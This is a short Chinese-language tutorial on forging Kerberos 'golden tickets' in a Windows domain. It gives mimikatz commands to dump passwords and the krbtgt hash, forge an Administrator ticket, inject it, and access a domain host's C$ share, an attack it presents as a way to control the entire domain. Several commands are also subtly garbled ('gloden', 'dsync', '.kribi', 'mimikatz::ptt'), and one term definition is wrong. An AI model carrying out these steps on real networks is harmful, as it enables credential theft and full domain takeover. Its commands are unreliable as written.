0、黃金票據是什么?
在與認證過程中,經過client與AS的通信會得到TGT,帶着TGT想TGS請求,得到票據ticket,用這個ticket可以來訪問應用服務器。如果這段有什么疑問,歡迎參考Kerberos認證協議分析。而這個黃金票據就是自己生成的TGT,在生成TGT的過程中,user、domain、timestamp、還有權限等信息會經過krbtgt(該賬號不自動更新)賬戶hash的加密,所以獲取到用戶、域、SID、krbtgt的hash值就可以生成黃金票據(一般拿到krbtgt需要域管權限,生成的票據當然也是域管賬號的,這樣就控了整個域,而且有了金票據,免除了as驗證username、password的階段,所以也不擔心域管密碼修改)。
1、名詞解釋
1.1 winlogon.exe
接受Username和Password、Domain信息,傳遞給lsass.exe。
1.2 lsass.exe
lsass.exe經過kerberos機制處理Username和Password后與SAM(賬號數據庫)進行比對驗證,返回登錄失敗的結果。
1.3 SAM數據庫
存儲賬號密碼Hash值的數據庫。
1.4 NetLogon
域認證的加密信道(安全信道sChannel)。
2、如何生成黃金票據
2.1 生成黃金票據需要的信息
2.1.1 windows域的名稱
PS C:\Users\Administrastor> systeminfo
2.1.2 krbtgt和賬號信息簇
mimikatz# sekurlsa::kerberos
mimikatz# sekurlsa::ticket /export
mimikatz# sekurlsa::logonpassword
mimikatz# lsadump::dsync /domain:xxx.xxx.xxx /user:krbtgt
mimikatz# lsadump::lsa /patch -> sid+ntlm
2.2 生成黃金票據
# 使用krbtgt的hash值:
mimikatz# kerberos::gloden /user:Administrator /domain:xxx.xxx.xxx /sid:xxxxxxxxxxxxx krbtgt:ntlm-hashvlaue /ticket:test.kribi
# 使用krbtgt的aes256值:
mimikatz# kerberos::gloden /domain:xxx.xxx /sid:xxxxxxxxxxx /aes256:xxxxxxxx /user:Administrator /ticket:test.kribi
3 黃金票據的使用
# 導入票據
mimikatz::ptt test.kribi
#檢驗緩存票據
PS C:\Users\Administrastor> klist
#利用票據訪問
PS C:\Users\Administrastor> net use \\xx.domain-name
dir \\xx.domain-name\c$